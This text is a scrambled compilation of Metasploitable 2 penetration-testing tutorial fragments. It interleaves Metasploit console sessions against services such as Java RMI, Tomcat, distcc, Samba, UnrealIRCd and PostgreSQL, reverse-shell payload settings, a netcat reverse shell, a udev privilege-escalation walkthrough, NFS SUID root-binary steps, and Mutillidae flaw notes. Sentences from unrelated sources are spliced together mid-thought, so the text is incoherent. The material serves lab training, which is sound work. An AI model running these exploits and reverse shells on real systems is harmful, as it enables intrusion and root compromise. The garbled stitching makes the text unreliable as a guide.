RHOSTS yes The target address range or CIDR identifier To build a new virtual machine, open VirtualBox and click the New button. Yet we've got the basics covered. Before we perform further enumeration, let us see whether the credentials we acquired can help us gain access to the remote system. msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp If a username is sent that ends in the sequence :) [a happy face], the backdoored version will open a listening shell on port 6200. [*] Writing to socket B 0 Generic (Java Payload) Thus, this list should contain all Metasploit exploits that can be used against Linux-based systems. Long-list the files with attributes in the local folder. It aids penetration testers in choosing and configuring exploits. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. Module options (exploit/multi/misc/java_rmi_server): RHOST => 192.168.127.154 The two dashes then comment out the remaining password validation within the executed SQL statement. [*] A is input It's time to enumerate this database and collect as much information as you can to plan a better strategy. :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password.
RHOST => 192.168.127.154 Download links: https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Set the SUID bit using the following command: chmod 4755 rootme. There are the following kinds of vulnerabilities in Metasploitable 2: Misconfigured services - a lot of services have been misconfigured and provide direct entry into the operating system. In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine.
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. The version range is somewhere between 3 and 4. Id Name [*] trying to exploit instance_eval Totals: 2 Items. Metasploitable 3 is the updated version based on Windows Server 2008. [*] Accepted the first client connection Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. msf auxiliary(tomcat_administration) > show options payload => linux/x86/meterpreter/reverse_tcp RHOST 192.168.127.154 yes The target address root STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host -- ---- payload => cmd/unix/interact msf exploit(drb_remote_codeexec) > set LHOST 192.168.127.159 Thus, we can infer that the port is TCP Wrapper protected. Step 7: Boot up the Metasploitable 2 machine and log in using the default username and password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. whoami [*] B: "qcHh6jsH8rZghWdi\r\n" Exploit target: ---- --------------- ---- ----------- To access a particular web application, click on one of the links provided. msf exploit(distcc_exec) > set payload cmd/unix/reverse Set-up This .
[*] Command: echo f8rjvIDZRdKBtu0F; We're on 64-bit Kali and the target is 32-bit, so we compile it specifically for 32-bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). Let's see if we can really connect without a password to the database as root. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. RHOSTS => 192.168.127.154 [*] Started reverse double handler The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. SESSION yes The session to run this module on. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) from that shared object. Payload options (java/meterpreter/reverse_tcp): [*] Accepted the first client connection Armitage is very user friendly. THREADS 1 yes The number of concurrent threads We're not going to go into the web applications here because, in this article, we're focused on host-based exploitation. We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! Next, place some payload into /tmp/run because the exploit will execute that. Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable 2.
Name Current Setting Required Description msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 [*] Started reverse double handler [*] Accepted the first client connection Differences between Metasploitable 3 and the older versions. msf exploit(usermap_script) > exploit msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp In the online forums some people think this issue is due to a problem with Metasploit 6, whilst Metasploit 5 does not have this issue. Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): In Metasploitable that can be done in two ways: first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine, or you can run an Nmap scan from Kali. From a security perspective, anything labeled Java is expected to be interesting. On Metasploitable 2, there are many other vulnerabilities open to exploit. [*] Reading from sockets -- ---- Pixel format: UnrealIRCD 3.2.8.1 Backdoor Command Execution. whoami ---- --------------- -------- ----------- XSS via logged-in user name and signature. The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1. DOM injection on the add-key error message, because the key entered is output into the error message without being encoded. You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value. You can SQL-inject the UID cookie value because it is used to do a lookup. You can change your rank to admin by altering the UID value. HTTP Response Splitting via the logged-in user name, because it is used to create an HTTP header. This page is responsible for cache-control but fails to do so. This page allows the X-Powered-By HTTP header. HTML comments. There are secret pages that, if browsed to, will redirect the user to the phpinfo.php page.
The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Let's start by using nmap to scan the target port. -- ---- In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: exploit module name with a brief description of the exploit, and list of platforms and CVEs (if specified in the module). It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. Both operating systems will be running as VMs within VirtualBox. Name Current Setting Required Description Utilizing login/password combinations supplied by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to validate against a PostgreSQL instance. [*] Banner: 220 (vsFTPd 2.3.4) In the next tutorial we'll use Metasploit to scan and detect vulnerabilities on this Metasploitable VM. Id Name To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan. whoami SQLi and XSS on the log are possible. GET for POST is possible because reading only POSTed variables is not enforced. Return to the VirtualBox Wizard now. RHOST => 192.168.127.154 [*] Found shell. Id Name [*], msf > use exploit/multi/http/tomcat_mgr_deploy Exploit target: ---- --------------- -------- ----------- The compressed file is about 800 MB and can take a while to download over a slow connection. SMBDomain WORKGROUP no The Windows domain to use for authentication The account root doesn't have a password. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.
msf exploit(usermap_script) > set RPORT 445 The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. [+] Found netlink pid: 2769 - Cisco 677/678 Telnet Buffer Overflow. VHOST no HTTP server virtual host [*] B: "f8rjvIDZRdKBtu0F\r\n" RHOSTS => 192.168.127.154 RHOSTS yes The target address range or CIDR identifier The primary administrative user msfadmin has a password matching the username. To proceed, click the Next button. -- ---- On July 3, 2011, this backdoor was eliminated. [*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb At a minimum, the following weak system accounts are configured on the system. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. At first, open the Metasploit console and go to Applications > Exploit Tools > Armitage. RHOSTS => 192.168.127.154 In our previous article on How To Install Metasploitable we covered the creation and configuration of a penetration testing lab. [*] Started reverse double handler [*] A is input [+] Backdoor service has been spawned, handling RPORT => 445 msf exploit(usermap_script) > set payload cmd/unix/reverse Name Current Setting Required Description So we got a low-privilege account. [*] Uploaded as /tmp/uVhDfWDg.so, should be cleaned up automatically We did an aggressive full port scan against the target. The ++ signifies that all computers should be treated as friendlies and be allowed to . Proxies no Use a proxy chain NetlinkPID no Usually udevd pid-1. Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres.
Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. Step 9: Display all the columns fields in the . The results from our nmap scan show that the ssh service is running (open) on a lot of machines. daemon, whereis nc Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather outdated OWASP Top 10. SSLCert no Path to a custom SSL certificate (default is randomly generated). It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints, as it calls a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint. (Note: See a list with the command ls /var/www.) Tutorials on using Mutillidae are available at the webpwnized YouTube Channel. We can now look into the databases and get whatever data we may like. Name Current Setting Required Description The nmap scan shows that the port is open but tcpwrapped. ---- --------------- -------- ----------- Id Name gcc root.c -o rootme (This will compile the C file to an executable binary) Step 12: Copy the compiled binary to the msfadmin directory in the NFS share. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 Module options (auxiliary/scanner/smb/smb_version): You can edit any TWiki page.